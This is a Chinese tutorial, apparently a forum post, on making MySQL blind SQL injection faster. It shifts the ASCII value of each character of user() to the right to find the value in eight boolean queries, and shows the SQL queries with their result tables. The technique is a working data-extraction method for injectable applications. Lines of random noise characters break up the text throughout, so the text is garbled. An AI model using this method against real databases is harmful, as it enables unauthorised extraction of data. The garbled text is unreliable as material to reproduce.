关于通过对8bit的ascii做右位移提高mysql盲注效率

admin

通过这种方法我们只需要做8次select来确定一个键值的第一位或第n位



下面将以查询mysql数据库当中user()的第一位为例:

, Z% G' t: ~1 n9 Q
) B" X7 c& V4 k. V  h/ {# H
ps:第二位,第三位依次类推 select substr(user(),2,1) mysql> select substr(user(),3,1)



首先执行如下sql语句:
6 }8 A9 r  F1 k) n; {: a
" Q2 O& ~4 w7 s2 G% `

mysql> select (ascii((substr(user(),1,1))) >> 7)=0;

, K) j5 Y* ]7 a1 I$ B2 Q' k, e

. }9 [' L1 t1 O" }4 E% u3 p; h  t我们将对这个8bit的ascii也就是user()的第一位做7次右偏移,也就是偏移到8bit的ascii的
* w! c& ]" s% g: z2 @4 n


  N* q* S$ `9 ]4 k6 X) J$ q; a8 x" P第一位并与0做等运算,如果,运算结果为0 说明第一位不为0,也就为1

6 I( P' w* }; ]/ h5 c, c
" ~$ \% D5 n  n7 J- N
如果运算结果为1,说明第一位为0,不为1


& s# G- j% s; t( `+ I5 D
+————————————–+
" O  H) S; b& {5 {* M
1 Q* z. y1 s8 [! R$ E# n| (ascii((substr(user(),1,1))) >> 7)=0 |
, S; O! M" ?, k- r5 J
+————————————–+
# N# [- ?1 [' Q
| 1 |
5 s5 s+ I0 J2 C2 C2 f3 E+ [8 A1 A. u
& D3 W+ q2 t0 T$ j; d6 m6 I+————————————–+
! y% \: E$ t) S$ P2 ^, l
( T# y/ A& W  P' e+ B! b# `$ m1 row in set (0.00 sec)
1 `9 s, p: U  O4 Z) b- ?5 Z
这样我们就确定这个8bit的ascii的第一位为0



# P3 G8 `/ ^$ ^1 `& l3 {第二次我们来做6次右偏移来确定前两位
, P6 Q) y/ ?* L0 P1 {# M* k


# G  n2 i6 a3 E1 g- ~前两位可能是01或00,即依然可以与0做比较,
8 @8 F" u: e- [  }
. W- `* X5 n% i; \* Q2 Imysql> select (ascii((substr(user(),1,1))) >> 6)=0;
/ j3 n& H, V0 j" D: d, k
+————————————–+

: M8 J7 Q& ?" R7 R| (ascii((substr(user(),1,1))) >> 6)=0 |

; n4 u% `, Y. Y7 o3 [! e+ a+————————————–+

| 0 |

( V2 d* l' n/ m9 R) p- Y/ g+————————————–+

) L% ]+ y: }1 g0 P2 P1 row in set (0.00 sec)



结果为0,即第二位为1
0 q4 g+ U  {2 K; S5 L; K% N& Y


开始猜测前三位为010或011
( w) K! v/ i; P' b8 `: c

% |/ ~9 e$ ~2 j* r! l
2 M2 y9 Q/ y8 w让我们看看010和011的ascii码是多少


' E- m1 B: ~# u% r
& v' u9 l1 y; |7 f0 g分别查询select b’011′ select b’010′
9 J4 f- p: m% F$ A0 r" b
9 Z# A: a, r" E$ o  K- b

获得结果 010 = 2 011 = 3
  [9 N, q5 s: a
1 {+ S1 g; E1 m& {
( d' Y, ~& d. y) C" R7 w3 {
/ Z6 i: |. k8 J- R: Q* _执行如下sql:
& |' I$ Z% [" l
) \0 o1 @* f9 O3 b2 N' [# c/ I

mysql> select (ascii((substr(user(),1,1))) >> 5)=2;
0 F3 ?. h8 z6 {- K2 W1 A( p
# j- H1 D$ w$ F+ t+————————————–+

| (ascii((substr(user(),1,1))) >> 5)=2 |

* A' e) E: S9 Y! m1 Z# C+————————————–+

| 0 |
6 T& m2 g$ S3 a( f1 [6 V# X0 D
+————————————–+
9 a. ]* E$ U4 k3 Q* e& c7 u; Q
即前三位不为010,而是011



直到获得最后一位
7 q! e2 S; U3 r7 T" V
% N+ T( E, Q( v
, l9 M' W1 e6 w' Q/ d
9 ?; W2 V& q! {' R. e最终结果为:01110010


+ o! `' @. W" l! N. ?& R" x
4 u9 z% a% n( ]3 B# Z; b2 i5 G& t0 d转换一下:



$ c9 ]% Y- O! f1 ^0 \; yselect b’01110010′
+ n7 x$ Y/ L# d
# i' i. v7 d6 L- V3 w9 G5 n

3 l% k6 _: C/ B1 p查询结果

6 E& }5 N+ `. r" N7 j* [

0 X7 ]0 U0 r* Y5 Z! m( H$ f+————-+

# N0 g* Y/ l  F- B| b’01110010′ |

3 `2 w: @* q6 W, G+————-+

) B9 ^1 F& N  }8 G- E| r |
. Z/ }  v' R0 u$ S) D
3 L0 s1 ~( M6 g+————-+
' H+ Z' S8 a* Q* [+ p
  U! v5 p2 n( c* f: s1 row in set (0.00 sec)
* M/ u+ S3 p% q1 }
1 t4 m8 ?1 [: ^# e6 w

1 ^3 e' ^( A; ]+ F0 N这样我们就获得了user()的第一位.其它位依此类推